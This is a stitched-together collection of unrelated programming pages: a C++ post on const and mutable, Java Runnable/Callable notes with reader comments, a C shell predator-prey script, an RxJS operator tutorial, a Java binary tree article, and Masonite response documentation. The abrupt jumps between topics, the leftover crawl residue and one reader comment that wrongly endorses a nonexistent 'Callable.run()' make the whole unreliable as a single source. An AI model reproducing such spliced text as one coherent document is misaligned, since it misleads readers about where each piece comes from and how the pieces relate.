    int val{12};
};

int main(){
    const int val{12};
    val = 13;        // assignment of read-only variable 'val'

    const Immutable immu;
    immu.val = 13;   // assignment of member 'Immutable::val' in read-only object
}
The error messages from the GCC are very convincing.
Declaring member functions as const has two benefits. An immutable object can only invoke const methods and const methods cannot modify the underlying object. Once more. Here is a short example which includes the error messages from GCC:
struct Immutable{
    int val{12};
    void canNotModify() const {
        val = 13;    // assignment of member 'Immutable::val' in read-only object
    }
    void modifyVal() {
        val = 13;
    }
};

int main(){
    const Immutable immu;
    immu.modifyVal();  // passing 'const Immutable' as 'this' argument discards qualifiers
}
This was not the full truth. Sometimes you have to distinguish between the logical and the physical constness of an object. Sounds strange, right?
Okay, physical constness is quite easy to grasp, but what about logical constness? Let me modify the previous example a little bit. Assume I want to change the attribute val in a const method.
// mutable.cpp

#include <iostream>

struct Immutable{
    mutable int val{12};   // (1)
    void canNotModify() const {
        val = 13;
    }
};

int main(){
    std::cout << std::endl;

    const Immutable immu;
    std::cout << "val: " << immu.val << std::endl;
    immu.canNotModify();   // (2)
    std::cout << "val: " << immu.val << std::endl;

    std::cout << std::endl;
}
The specifier mutable (1) made the magic possible. The const object can, therefore, invoke the const method (2) which modifies val.
Here is a nice use-case for mutable. Imagine your class has a read operation which should be const. Because the objects of the class are used concurrently, you have to protect the read method with a mutex. So the class gets a mutex, and you lock it in the read operation. Now you have a problem: your read method cannot be const because of the locking of the mutex. The solution is to declare the mutex as mutable.
Here is a sketch of the use-case. Without mutable, this code would not work.
struct Immutable{
    mutable std::mutex m;
    int read() const {
        std::lock_guard<std::mutex> lck(m);
        // critical section
        ...
    }
};
Okay, this rule is quite obvious. If you pass pointers or references to const to a function, the intention of the function is obvious: the pointed-to or referenced object will not be modified.
void getCString(const char* cStr);
void getCppString(const std::string& cppStr);
Are both declarations equivalent? Not one hundred per cent. In the case of the function getCString, the pointer could be a null pointer. This means you have to check in the function via if (cStr) ....
But there is more. The pointer and the pointee could each be const.
Here are the variations:
const char* cStr: cStr points to a const char; the character cannot be modified through cStr.
char* const cStr: cStr is a const pointer to a char; the pointer itself cannot be changed.
const char* const cStr: a const pointer to a const char; neither can be modified.
Too complicated? Read the expressions from right-to-left. Still too complicated? Use a reference to const.
I want to present the next two rules from the concurrency perspective. Let me present them together.
If you want to share an immutable variable between threads and the variable is declared as const, you are done. You can use it without synchronisation, and you get the most performance out of your machine. The reason is quite simple: to get a data race, you need mutable, shared state.
There is only one problem to solve: you have to initialise the shared variable in a thread-safe way. I have at least four ideas in mind:
1. Initialise it before you start any thread.
2. Use std::call_once in combination with std::once_flag.
3. Use a static variable with block scope.
4. Use a constexpr variable.
A lot of people overlook variant 1, which is quite easy to get right. You can read more about the thread-safe initialisation of a variable in my previous post: Thread-safe Initialization of Data.
Rule Con.5 is about variant 4. When you declare a variable as constexpr, such as constexpr double totallyConst = 5.5;, totallyConst is initialised at compile time and is, therefore, thread-safe.
That is not all there is to constexpr. The C++ Core Guidelines forget to mention one important aspect of constexpr in concurrent environments: constexpr functions are sort of pure. Let's have a look at a constexpr gcd function.
constexpr int gcd(int a, int b){
    while (b != 0){
        auto t = b;
        b = a % b;
        a = t;
    }
    return a;
}
First, what does pure mean? And second, what does sort of pure mean?
A constexpr function can be executed at compile time, and there is no state at compile time. When you use a constexpr function at runtime, however, the function is not per se pure. Pure functions are functions that always return the same result when given the same arguments. Pure functions are like infinitely large tables from which you look up your value. The guarantee that an expression always returns the same result when given the same arguments is called referential transparency.
Pure functions have a lot of advantages:
In particular, point 2 makes pure functions precious in concurrent environments. The table shows the key points of pure functions.
I want to stress one point. constexpr functions are not per se pure. They are pure when executed at compile time.
That was it. I'm done with constness and immutability in the C++ Core Guidelines. In the next post, I start to write about the future of C++: templates and generic programming.
Runnable, Callable, FutureTask, ExecutorService and thread pool
Some notes on Java concurrency, starting with Runnable vs Callable:
(1) Runnable.run() does not return a value; Callable<T>.call() returns a value of type T. Callable<T> is a parameterized type whose type parameter indicates the return type of its call method. Runnable cannot be parameterized.
(2) Runnable.run() cannot throw any checked exception; Callable<T>.call() can throw checked and unchecked exceptions.
(3) So it seems Callable is more powerful than Runnable. But you cannot just replace all uses of Runnable with Callable. For example, in new Thread(runnable): you cannot instantiate a new thread with a Callable.
(4) Callable was introduced in Java SE 5 as part of the java.util.concurrent library. Callable is mainly intended for use with ExecutorService, which is a higher-level service than the direct manipulation of Thread. Both Runnable and Callable can be submitted to an ExecutorService for (usually asynchronous) execution.
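Point (4) can be sketched as a minimal runnable program (the class name and the toy task are mine): a Callable is submitted to an ExecutorService and its result is read back through a Future.

```java
import java.util.concurrent.Callable;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

public class CallableDemo {
    public static void main(String[] args) throws Exception {
        ExecutorService pool = Executors.newSingleThreadExecutor();

        Callable<Integer> task = () -> 6 * 7;        // returns a value and may throw
        Future<Integer> future = pool.submit(task);  // runs asynchronously

        System.out.println(future.get());            // get() blocks until done: prints 42
        pool.shutdown();
    }
}
```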
(5) java.util.concurrent.Executors (a utility class similar to Collections and Arrays) has methods to upgrade a Runnable to a Callable, but not the other way around.
Callable<Object> callable(Runnable task)
<T> Callable<T> callable(Runnable task, T result)

The Callable converted from callable(Runnable) returns null. The Callable converted from callable(Runnable, T) returns T. However, this return value that was passed in by the client is not the real result of executing the task. Its purpose is to tell the client that the return type will be Future<T>. In order to obtain the real result, the client still needs to arrange for thread-safe shared data storage, e.g., a final or volatile field of the Runnable impl. Therefore, the converted Callable is still a Runnable at its core.
(6) FutureTask is another artifact involving both Callable and Runnable. FutureTask class implements RunnableFuture interface, which in turn extends both Runnable and Future interfaces. So FutureTask is a Runnable by inheritance, and can be passed to new Thread(futureTask), or ExecutorService.submit(futureTask).
FutureTask has a Callable<V> by composition as FutureTask's constructor takes Callable<V> as a param. FutureTask also has another constructor that takes 2 params (Runnable, V), which are simply converted to Callable via Executors.callable(Runnable, V). In fact, the same pattern is employed in java.util.concurrent wherever a method is overloaded with (Callable) and (Runnable, V).
(7) Runnable's run() and Callable's call() methods take no parameters. Why? For one thing, there is no way to know which types would be passed in; the best we could do is probably Object[] if we were to add parameters. More importantly, it would export state from the calling thread to the task thread, and entail synchronization between the two sides. I guess this is why the plain old Runnable.run() takes no param and returns void. In Java 5, to balance simplicity and usefulness, Callable was added to return a result.
(8), how can a task be performed without any params passed to run()? The typical answer is to pass any required data in when instantiating the Callable or Runnable impl class via its constructor. For example,
public class RunnableImpl implements Runnable {
    private final List<String> names;
    public RunnableImpl(List<String> names) {
        this.names = names;
    }
    public void run() {...}
}

If RunnableImpl is a static inner class, its run() method can directly reference any static fields in the enclosing class. If RunnableImpl is an instance inner class, its run() method can directly reference any static and instance fields in the enclosing class. If RunnableImpl is an anonymous inner class, its run() method can directly reference any static and instance fields of the enclosing class, and any final local variables in the enclosing method.
(9) You can call Thread.setUncaughtExceptionHandler, or Thread.setDefaultUncaughtExceptionHandler, to handle exceptions from Runnable.run(). When using an ExecutorService, where you have no direct control of the threads, you can use a custom ThreadFactory. The Executors methods newCachedThreadPool, newFixedThreadPool, newScheduledThreadPool, newSingleThreadExecutor and newSingleThreadScheduledExecutor all take a custom ThreadFactory.
(10) Worker threads in thread pools and regular threads are different. A regular thread dies after its run method terminates and cannot be restarted. A worker thread does not die after the completion of the assigned task; it goes back to the thread pool. The main run method of a worker thread is an infinite loop: take a task from the work queue and invoke the task's run method to perform it.
(11) ThreadLocal variables should be cleared by the client once the task is done. Otherwise the left-over references in worker threads prevent the referenced objects from being garbage-collected. Over time this may cause OutOfMemoryError.
(12) The default work queue of a thread pool in the ExecutorService framework is unbounded. This means that once corePoolSize is reached, all subsequent requests go into this unbounded BlockingQueue until some busy worker thread completes its task. No new worker threads are created beyond corePoolSize, and maximumPoolSize is ignored in this case. For more details, see bug 6756747: java.util.concurrent.ThreadPoolExecutor doesn't create new worker when it should.
2 comments:
Callable.run() is quite misleading. The Callable interface provides a .call() method instead.
Callable.run() is excellent. Understand the basics of threads first
Source code
#!/bin/csh
alias commas "echo \!:1 | sed -e :a -e 's/\(.*[0-9]\)\([0-9]\{3\}\)/\1,\2/;ta'"
# The program is to output a day-by-day account of the populations
# until one of them dies off or the end of the observation period is
# reached.
# All reproductions and deaths occur overnight.
# Any fractional fish are discarded.
# These sharks only feed during the day.
if ( $1 == 'default' ) then
    set sharks = 54
    set guppies = 1000
    set duration = 150
else
    printf "Please enter number of sharks: "
    set sharks = $<
    printf "Please enter number of guppies: "
    set guppies = $<
    printf "Number of days to observe: "
    set duration = $<
endif
set day = 0
while ( $day < $duration )
    @ day = $day + 1
    #print
    printf "Start of %3s Day: %15s sharks %15s guppies\n" $day `commas $sharks` `commas $guppies`
    if ( $sharks <= 0 || $guppies <= 0 ) then
        break
    endif
    # Each shark eats 5 guppies a day.
    @ guppies_eaten = ( $sharks * 5 )
    @ guppies = ( $guppies - $guppies_eaten )
    if ( $guppies < 0 ) then
        set guppies=0
    endif
    #print
    printf "End of %5s Day: %15s sharks %15s guppies\n" $day `commas $sharks` `commas $guppies`
    if ( $sharks <= 0 || $guppies <= 0 ) then
        break
    endif
    # The guppies increase at a rate of 80% per day,
    # provided the shark population is less than 20 % of the guppy population.
    # Otherwise there is no increase in the guppy population.
    if ( ( $guppies / $sharks ) > 5 ) then
        @ guppy_plus = ( $guppies * 80 ) / 100
        @ guppies = ( $guppies + $guppy_plus )
    endif
    # The sharks increase at a rate of 5% of the guppy population per day,
    # provided there are 50 or more guppies per shark.
    # Otherwise, the sharks die off at a rate of 50% per day.
    if ( ( $guppies / $sharks ) > 50 ) then
        @ shark_increase = ( $guppies / 20 )
        @ sharks = ( $sharks + $shark_increase )
    else
        @ sharks = ( $sharks / 2 )
    endif
end
exit 0
Lessons
- C shell does not have functions, so all logic must be in-lined. An "alias" can be created to reuse code, such as formatting a number with commas using the "sed" program.
- Mathematical expressions assigned to a variable must be introduced with the "@" sign instead of the keyword "set".
- Notice that the syntax is closer to BASIC than the C language with regards to control statements. You must include the key word "then" after the "if" statement expression.
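The commas alias from the first lesson can also be written as a POSIX shell function (the function form is my own; the sed loop is unchanged: define label a, substitute once, and branch back with ta while a substitution succeeded):

```shell
# Insert thousands separators into a number, e.g. 1234567 -> 1,234,567
commas() {
  echo "$1" | sed -e :a -e 's/\(.*[0-9]\)\([0-9]\{3\}\)/\1,\2/;ta'
}

commas 1234567   # prints 1,234,567
```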
Notes
- Bourne shell version by Chris F.A. Johnson from which this version was ported.
- The homework assignment that was the genesis of this program | http://en.m.wikibooks.org/wiki/C_Shell_Scripting/Guppies | CC-MAIN-2013-48 | refinedweb | 385 | 68.7 |
With this article I want to briefly describe the differences between the RxJS operators tap, map and switchMap.

There are many blog posts out there which cover these topics already, but maybe this helps you understand them if the other posts did not. :)

Let us start by creating an observable from an array with from():

import { from } from 'rxjs';

const observable$ = from([1, 2, 3]);
If we now subscribe to it, we can do something with the values that get emitted:

import { from } from 'rxjs';

const observable$ = from([1, 2, 3]);
observable$.subscribe((item) => console.log(item));

In the console we should see the values 1, 2, 3 as output.
Let us get to the first operator.
Tap
The first one is the tap operator, which is used for side effects inside a stream. It lets you do something with each value while returning the same observable it was called on: it runs a callback to produce an isolated side effect.

import { from } from "rxjs";
import { tap } from "rxjs/operators";

from([1, 2, 3])
  .pipe(tap(item => { /* do something with value */ }))
  .subscribe(item => console.log(item));

You can pass the tap operator up to three callbacks, which all have the void return type. The original observable stays untouched. But that does not mean that you cannot manipulate the items in the stream.

Let us use reference types inside a tap operator. When using reference types, the tap operator can modify the properties on the values you pass in.
const objects = [
  { id: 1, name: 'Fabian' },
  { id: 2, name: 'Jan-Niklas' },
];

const source$ = from(objects)
  .pipe(tap((item) => (item.name = item.name + '_2')))
  .subscribe((x) => console.log(x));

Outcome:

{ id: 1, name: "Fabian_2" }
{ id: 2, name: "Jan-Niklas_2" }

So the tap operator runs its callback for each item it is used on, is meant for side effects, and returns an observable identical to the one from the source.
Map
Let us move on and try another operator: map instead of tap.

We can take the same situation and use the map operator in place of tap. The code sample now looks like this:

import { from } from 'rxjs';
import { map } from 'rxjs/operators';

from([1, 2, 3])
  .pipe(map((item) => item + 2))
  .subscribe((item) => console.log(item));
Check the outcome now: the map operator does affect the output! You should see 3, 4, 5 in the console.

So what the map operator does is: it takes a value from the stream, can manipulate it, and passes the manipulated value further along the stream.

Adding a number is one example; you could also create new objects here and return them, etc.

So to manipulate the items in a stream, the map operator is your friend.
SwitchMap
That leaves the switchMap operator. I personally needed a little time to get my head around it, and I hope to clarify things here. 😊

So let us take another look at the map operator:

import { from } from "rxjs";
import { map } from "rxjs/operators";

from([1, 2, 3])
  .pipe(map(item => { /* does something */ }))
  .subscribe(item => console.log(item));
Now let us write the result of each line in a comment:

import { from } from 'rxjs';
import { map } from 'rxjs/operators';

// returns an observable
from([1, 2, 3])
  // gets out the values and modifies them, but keeps
  // the same observable as the return value
  .pipe(map((item) => item + 1))
  // resolves the observable and gets
  // out the values themselves
  .subscribe((item) => console.log(item));
We know that subscribe resolves an observable and gets out the values inside the stream.

Now let us face a situation like this: you have a stream of a specific type, say a stream of numbers again. You need these numbers to do something else, like passing them to a service that returns an item based on each number. But this service returns not a number, like item + 2 does, but an observable again!

If you use the map operator here, let's play that through and write the output in comments again:

import { from } from 'rxjs';
import { map } from 'rxjs/operators';

// returns an observable
from([1, 2, 3])
  // gets out the values and uses them, but keeps the same observable as the
  // return value. In addition, the value returned by the called method is
  // itself a new observable, so we are returning an observable of observables!
  .pipe(map((item) => methodWhichReturnsObservable(item)))
  // resolves _one_ observable and gets
  // out the values themselves
  .subscribe((item) => console.log(item));
What would the type of resultItem in the subscribe be? We know that a subscribe resolves an observable, so that we can get to its values. But it resolves one observable. We mapped our observable into a second observable, because methodWhichReturnsObservable(item) returns, surprise surprise, another observable.

So what we want is a kind of map operator that resolves the first observable, uses the values, and then switches to the next observable while keeping the stream, so that when we subscribe we get the (real) values of the last observable. The switchMap operator does exactly that.

So the whole thing written with the switchMap operator looks like:

import { from } from "rxjs";
import { switchMap } from "rxjs/operators";

// returns an observable
from([1, 2, 3])
  // gets out the values _and resolves_ the first
  // observable, as the method returns a new observable
  .pipe(switchMap(item => methodWhichReturnsObservable(item)))
  // => get the real values of the last observable
  .subscribe(resultItem => console.log(resultItem));
In the last subscribe the values are picked out of the last observable.
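If the observable machinery makes this hard to picture, here is a plain-JavaScript analogy with no RxJS involved (the helper inner stands in for methodWhichReturnsObservable, and arrays stand in for observables): mapping with a container-returning function nests containers, while a flattening operator such as switchMap, mergeMap or concatMap keeps the stream flat (they differ only in how they schedule the inner containers).

```javascript
// Arrays play the role of observables here.
const inner = (n) => [n, n + 1]; // a "method which returns a container"

const mapped = [1, 2, 3].map(inner);        // container of containers: [[1,2],[2,3],[3,4]]
const flattened = [1, 2, 3].flatMap(inner); // flattened, like switchMap: [1,2,2,3,3,4]

console.log(mapped);
console.log(flattened);
```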
I hope to have explained this in an understandable way.
Thanks. | https://offering.solutions/blog/articles/2019/10/20/tap-map-switchmap-explained/ | CC-MAIN-2020-45 | refinedweb | 965 | 62.07 |
IsDirty and GetDirty
On 04/07/2014 at 02:57, xxxxxxxx wrote:
I'd like to check, using a plugin or a script, whether an object has changed.
IsDirty is not giving me any information, so I use GetDirty and check whether its value has changed.
That is OK in Model mode, but in Polygon mode the value returned by GetDirty does not change when I move a polygon.
DIRTY_MATRIX and the others all return the same value.
How can I check whether a polygon has been moved, scaled or rotated?
import c4d
from c4d import gui

def main():
    obj = doc.SearchObject("Cube")
    print "--- IsDirty ---"
    print "Get DIRTY_MATRIX", obj.GetDirty(c4d.DIRTY_MATRIX)
    print "Get DIRTY_SELECT: ", obj.GetDirty(c4d.DIRTY_SELECT)
    print "Get DIRTY_CACHE: ", obj.GetDirty(c4d.DIRTY_CACHE)
    print "Get DIRTY_CHILDREN: ", obj.GetDirty(c4d.DIRTY_CHILDREN)

if __name__=='__main__':
    main()
On 04/07/2014 at 04:54, xxxxxxxx wrote:
IsDirty() should be used for Generator plugins only.
You know there is another one, DIRTYFLAGS_DATA, right? It changes when the polygons or points of an object change.
Best,
-Niklas | https://plugincafe.maxon.net/topic/8010/10407_isdirty-and-getdirty | CC-MAIN-2019-13 | refinedweb | 177 | 67.76 |
Hi,
> 1. I have a set of in-memory schema grammars for one or more namespaces. I
> always want to use this instead of the one specified in the xml instance
> doc.
> I can cache the in-memory grammars but would the SAX Parser automatically
> resolve the schema in the instance doc to the in-memory one.
> Since I would be writing a generic handler, I would not know the names of
> the exact schema locations specified in the instance document.
It will be matched based on namespace, so it will do what you want. Check out useCachedGrammarInParse.
> 2. Can I force validation on a xml which does NOT have a schemaLocation
> specified using the in-memory schema.
Yes, set validation to on. schemaLocation is only a hint.
> 3. What happens if the SAX parser has an error while grammars are cached.
> Are they cleared and the grammars have to be cached again.
No, they are still cached.
Gareth
--
Gareth Reakes, Managing Director Parthenon Computing
+44-1865-811184
---------------------------------------------------------------------
To unsubscribe, e-mail: xerces-c-dev-unsubscribe@xml.apache.org
For additional commands, e-mail: xerces-c-dev-help@xml.apache.org | http://mail-archives.apache.org/mod_mbox/xerces-c-dev/200404.mbox/%3C20040422030902.N99692@minotaur.apache.org%3E | CC-MAIN-2016-22 | refinedweb | 189 | 67.65 |
Trees in Java — How to Implement a Binary Tree?
If I had to pick the single most important topic in software development, it would be data structures. One of the most common and easiest ones is a tree — a hierarchical data structure. In this article, let’s explore Trees in Java.
- What is a Binary Tree?
- Types of Binary Tree
- Binary Tree Implementation
- Tree Traversals
- Applications of Binary Tree
What is a Binary Tree?
A tree is a non-linear data structure where data objects are generally organized in terms of hierarchical relationships. The structure is non-linear in the sense that, unlike Arrays, Linked Lists, Stacks and Queues, data in a tree is not organized linearly. A binary tree is a recursive tree data structure where each node can have 2 children at most.
Binary trees have a few interesting properties when they’re perfect:
- Property 1: The number of total nodes on each “level” doubles as you move down the tree.
- Property 2: The number of nodes on the last level is equal to the sum of the number of nodes on all other levels, plus 1
Each data element stored in a tree structure is called a node. A tree node contains the following parts:
1. Data
2. Pointer to left child
3. Pointer to the right child
In Java, we can represent a tree node using a class. Below is an example of a tree node with integer data.
static class Node {
    int value;
    Node left, right;

    Node(int value) {
        this.value = value;
        left = null;
        right = null;
    }
}
Now that you know what a binary tree is, let's check out different types of binary trees.
Types of Binary Trees
Full Binary Tree
A full binary tree is a binary tree in which every node has exactly 0 or 2 children.
Perfect Binary Tree
A binary tree is a perfect binary tree if all internal nodes have two children and all leaves are at the same level.
Complete Binary Tree
A complete binary tree is a binary tree in which every level, except possibly the last, is completely filled, and all nodes are as far left as possible.
Now that you are aware of different types of binary trees, let’s check out how to create a binary tree.
Binary Tree Implementation
For the implementation, there’s an auxiliary Node class that will store int values and keeps a reference to each child. The first step is to find the place where we want to add a new node in order to keep the tree sorted. We’ll follow these rules starting from the root node:
- if the new node’s value is lower than the current node’s, go to the left child
- if the new node’s value is greater than the current node’s, go to the right child
- when the current node is null, we’ve reached a leaf node, we insert the new node in that position
Now let’s see how we can implement this logic with the help of an example:
package MyPackage;
public class Tree {
static class Node {
int value;
Node left, right;
Node(int value){
this.value = value;
left = null;
right = null;
}
}
public void insert(Node node, int value) {
    if (value < node.value) {
        if (node.left != null) {
            insert(node.left, value);
        } else {
            System.out.println(" Inserted " + value + " to left of " + node.value);
            node.left = new Node(value);
        }
    } else if (value > node.value) {
        if (node.right != null) {
            insert(node.right, value);
        } else {
            System.out.println(" Inserted " + value + " to right of " + node.value);
            node.right = new Node(value);
        }
    }
}
public void traverseInOrder(Node node) {
if (node != null) {
traverseInOrder(node.left);
System.out.print(" " + node.value);
traverseInOrder(node.right);
}
}
public static void main(String args[])
{
Tree tree = new Tree();
Node root = new Node(5);
System.out.println("Binary Tree Example");
System.out.println("Building tree with root value " + root.value);
tree.insert(root, 2);
tree.insert(root, 4);
tree.insert(root, 8);
tree.insert(root, 6);
tree.insert(root, 7);
tree.insert(root, 3);
tree.insert(root, 9);
System.out.println("Traversing tree in order");
tree.traverseInOrder(root);
}
}
Output:
Binary Tree Example
Building tree with root value 5
Inserted 2 to left of 5
Inserted 4 to right of 2
Inserted 8 to right of 5
Inserted 6 to left of 8
Inserted 7 to right of 6
Inserted 3 to left of 4
Inserted 9 to right of 8
Traversing tree in order
2 3 4 5 6 7 8 9
In this example, we have used in-order traversal to traverse the tree. The in-order traversal consists of first visiting the left sub-tree, then the root node, and finally the right sub-tree. There are more ways to traverse a tree. Let’s check them out.
Tree Traversals
Trees can be traversed in several ways: Let’s use the same tree example that we used before for each case.
Depth First Search
Depth-first search is a type of traversal where you go as deep as possible down one path before backing up and trying a different one. There are several ways to perform a depth-first search: in-order, pre-order and post-order.
We already checked out in-order traversal. Let’s check out pre-order and post-order now.
Pre-Order Traversal
In Pre-order traversal you visit the root node first, then the left subtree, and finally the right subtree. Here’s the code.
public void traversePreOrder(Node node) {
if (node != null) {
System.out.print(" " + node.value);
traversePreOrder(node.left);
traversePreOrder(node.right);
}
}
Output:
5 2 4 3 8 6 7 9
Post-Order Traversal
In Post-order traversal you visit left subtree first, then the right subtree, and the root node at the end. Here’s the code.
public void traversePostOrder(Node node) {
if (node != null) {
traversePostOrder(node.left);
traversePostOrder(node.right);
System.out.print(" " + node.value);
}
}
Output:
3 4 2 7 6 9 8 5
Breadth-First Search
This type of traversal visits all the nodes of a level before going to the next level. It is like throwing a stone in the center of a pond. The nodes you explore “ripple out” from the starting point. Breadth-First Search is also called level-order and visits all the levels of the tree starting from the root, and from left to right.
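The article shows code only for the depth-first orders; a level-order traversal can be sketched with a FIFO queue as below. This is a hedged, self-contained sketch: the class and method names are mine, mirroring the earlier Node class rather than extending the article's Tree class.

```java
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.List;
import java.util.Queue;

public class LevelOrder {
    static class Node {
        int value;
        Node left, right;
        Node(int value) { this.value = value; }
    }

    // Visit nodes level by level, left to right, using a FIFO queue.
    static List<Integer> traverseLevelOrder(Node root) {
        List<Integer> visited = new ArrayList<>();
        if (root == null) return visited;
        Queue<Node> queue = new ArrayDeque<>();
        queue.add(root);
        while (!queue.isEmpty()) {
            Node n = queue.remove();          // take the oldest discovered node
            visited.add(n.value);
            if (n.left != null) queue.add(n.left);
            if (n.right != null) queue.add(n.right);
        }
        return visited;
    }

    public static void main(String[] args) {
        Node root = new Node(5);
        root.left = new Node(2);
        root.right = new Node(8);
        root.left.right = new Node(4);
        System.out.println(traverseLevelOrder(root)); // [5, 2, 8, 4]
    }
}
```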
Applications of Binary Tree
Applications of binary trees include:
- Used in many search applications where data is constantly entering/leaving
- As a workflow for compositing digital images for visual effects
- Used in almost every high-bandwidth router for storing router-tables
- Also used in wireless networking and memory allocation
- Used in compression algorithms and many more
This brings us to the end of this ‘Trees in Java’ article.
Make sure you practice as much as possible and share your experience.
Originally published at on September 3, 2019. | https://medium.com/edureka/java-binary-tree-caede8dfada5?source=post_internal_links---------1---------------------------- | CC-MAIN-2020-50 | refinedweb | 1,380 | 67.35 |
Opened 3 years ago
Closed 3 years ago
Last modified 3 years ago
#21643 closed Bug (fixed)
QuerySets that use F() + timedelta() crash when compiling their query more than once
Description
Attachments (2)
Change History (14)
Changed 3 years ago by
comment:1 Changed 3 years ago by
Changed 3 years ago by
Regression test.
comment:2 Changed 3 years ago by
Verified the test and the rest of the test suite on SQLite.
comment:3 Changed 3 years ago by
Wouldn't it be better to use just node.children[-1] instead of .pop()?
comment:4 Changed 3 years ago by
I've thought about that, but then the datetime value gets put in the query the second time (and incorrectly) in evaluate_node. There's probably a better way to do this, but I'm not exactly knowledgeable enough about Django internals to figure it out. The patch attached works as a quick-and-easy fix.
comment:5 Changed 3 years ago by
Sorry, I meant the timedelta value.
comment:6 Changed 3 years ago by
OK, good enough for me. Is this a regression in 1.6 or has this bug existed for a longer time (that is, does this need to be backpatched to 1.6)?
comment:7 Changed 3 years ago by
Google seems to find reports of the error from way back in December 2011. The code in question hasn't been touched since it appeared with the introduction of support for F() + timedelta(). Looks like it's been this way for years.
comment:8 Changed 3 years ago by
comment:9 Changed 3 years ago by
This is a regression in 1.6, I believe due to the deep copy changes when cloning querysets. I confirmed that F() + timedelta() does work in 1.5.
Previously, the DateModifierNode expression would have been deep copied every time a queryset was cloned, so it would never have been evaluated twice.
So I think this should be backported.
Also #22101 was a duplicate.
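The failure mode can be sketched in plain Python (schematic only — the class below is an illustrative stand-in, not Django's actual DateModifierNode):

```python
import copy
import datetime

class DateModifierNode:
    """Schematic stand-in; NOT Django's real class."""
    def __init__(self, children):
        self.children = children

    def compile(self):
        # The buggy pattern: .pop() mutates the node, so compiling the
        # same node twice loses the timedelta operand.
        delta = self.children.pop()
        return "col + INTERVAL '%s'" % delta

shared = DateModifierNode(["start", datetime.timedelta(hours=1)])
cloned = copy.deepcopy(shared)   # pre-1.6 queryset cloning deep copied the node

first = shared.compile()    # consumes the timedelta from `shared`
second = cloned.compile()   # the deep copy still has its own operand
assert first == second
# Compiling `shared` a second time would pop "start" instead -- the wrong
# operand -- which is the crash this ticket describes for 1.6 clones
# that share the node.
```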
comment:10 Changed 3 years ago by
The test from the fix already applied also fails in 1.5, but the following test passes in 1.5 and fails in 1.6 showing that this is a regression.
def test_query_clone(self):
    # Ticket #21643
    qs = Experiment.objects.filter(end__lt=F('start') + datetime.timedelta(hours=1))
    qs2 = qs.all()
    list(qs)
    list(qs2)
Is it enough to backport the existing commit, or should this new test also be committed and backported?
Could you write a regression test that demonstrates the problem and proves it's fixed? | https://code.djangoproject.com/ticket/21643 | CC-MAIN-2017-17 | refinedweb | 431 | 74.19 |
Most of the responses you will work with simply involve returning various data types / classes / objects from the controller method. For example, you may be used to returning a view.render() object in the controller method. This will return a View instance, which Masonite will extract the rendered HTML template from.
Below is a list of all the responses you can return.
You can simply return a string which will output the string to the browser:
def show(self):
    return 'string here'
This will set headers and the content length similar to a normal HTML response.
You can return an instance of a View object, which Masonite will then pull the Jinja-rendered HTML from. This is the normal process of returning your templates. You can do so by type hinting the View class and using the render method:

from masonite.view import View

def show(self, view: View):
    return view.render('your/template', {'key': 'value'})
Notice you can also pass in a dictionary as a second argument which will pass those variables to your Jinja templates.
There are a few ways to return JSON responses. The easiest way is to simply return a dictionary like this:
def show(self):
    return {'key': 'value'}
This will return a response with the appropriate JSON related headers.
Similarly, you can return a list:
def show(self):
    return [1, 2, 3, 4]
If you are working with models, then it's pretty easy to return a model as a JSON response by simply returning the model. This is useful when working with single records:
from app.User import User

# ...

def show(self):
    return User.find(1)
This will return a response like this:
{"id": 1,"name": "Brett Huber","password": "...","remember_token": "...","verified_at": null,"created_at": "2019-08-24T01:26:42.675467+00:00","updated_at": "2019-08-24T01:26:42.675467+00:00",}
If you are working with collections, you can return the collection itself, which yields a slightly different JSON response with several results:
from app.User import User

# ...

def show(self):
    return User.all()
Which will return a response like:
[{"id": 1,"name": "Brett Huber","password": "...",...},{"id": 2,"name": "Jack Baird","password": "...",...},...}]
If you need to paginate a response, you can return an instance of Paginator. You can do so easily by using the paginate() method:

from app.User import User

# ...

def show(self):
    return User.paginate(10)
The value you pass in to the paginate method is the page size or limit of results you want to return.
This will return a response like:
{"total": 55,"count": 10,"per_page": 10,"current_page": 1,"last_page": 6,"from": 1,"to": 10,"data": [{"id": 1,"name": "Brett Huber","password": "...",...},{...}
You can override the page size and page number by passing in the appropriate query inputs. You can change the page you are looking at by passing in a ?page= input, and you can change the amount of results per page by using the ?page_size= input.
If you are building an API, this might look like /api/users?page=2&page_size=5. This will return 5 results on page 2 for this endpoint.
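The metadata fields in the paginated response above can be derived from the page and page size alone. A framework-free sketch of the arithmetic (an illustration, not Masonite's actual implementation):

```python
import math

def paginate_meta(total, page=1, page_size=10):
    """Compute the metadata fields shown in the paginated response above."""
    last_page = max(1, math.ceil(total / page_size))
    start = (page - 1) * page_size + 1
    end = min(page * page_size, total)
    return {
        "total": total,
        "count": end - start + 1,   # records on this page
        "per_page": page_size,
        "current_page": page,
        "last_page": last_page,
        "from": start,
        "to": end,
    }

meta = paginate_meta(55, page=1, page_size=10)
# matches the sample response: 55 total, 6 pages, records 1 through 10
```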
You can also return a few methods on the request class. These are mainly used for redirection.
For redirecting to a new route you can return the redirect() method:

from masonite.request import Request

# ...

def show(self, request: Request):
    return request.redirect('/some/route')
There are several different ways for redirecting like redirecting to a named route or redirecting back to the previous route. For a full list of request redirection methods read the Request Redirection docs.
The response class is what Masonite uses internally, but you can use it explicitly if you find the need to. One such need might be setting a response in a middleware or a service provider, where Masonite does not handle all the response converting for you. It is typically used to condense a lot of redundant logic throughout the framework, like getting the response ready and setting status codes, content lengths, and content types.
Previously this needed to be individually set but now the response object abstracts a lot of the logic. You will likely never need to encounter this object during normal development but it is documented here if you need to use it similarly to how we use it in core.
We can set a JSON response by using the json() method. This simply requires a dictionary:

from masonite.response import Response

def show(self, response: Response):
    return response.json({'key': 'value'})
This will set the Content-Type, Content-Length, status code, and the actual response for you.
Keep in mind this is the same thing as doing:
def show(self):
    return {'key': 'value'}
Since Masonite uses a middleware that abstracts this logic.
The view() method takes either a View object or a string:

from masonite.response import Response
from masonite.view import View

def show(self, response: Response, view: View):
    return response.view('hello world')

def show(self, response: Response, view: View):
    return response.view(view.render('some.template'))
Status codes can be set in controller methods in 1 of 2 ways. The first way is to use the response object like above, but set a status= parameter, something like this:

from masonite.response import Response
from masonite.view import View

def show(self, response: Response, view: View):
    return response.view('hello world', status=401)
The second way is to use a normal response but return a tuple. The above example might look something like this:

from masonite.response import Response
from masonite.view import View

def show(self, response: Response, view: View):
    return 'hello world', 401
You can also use some very basic URL redirection using the response object:
from masonite.response import Response

def show(self, response: Response):
    return response.redirect('/some/route')
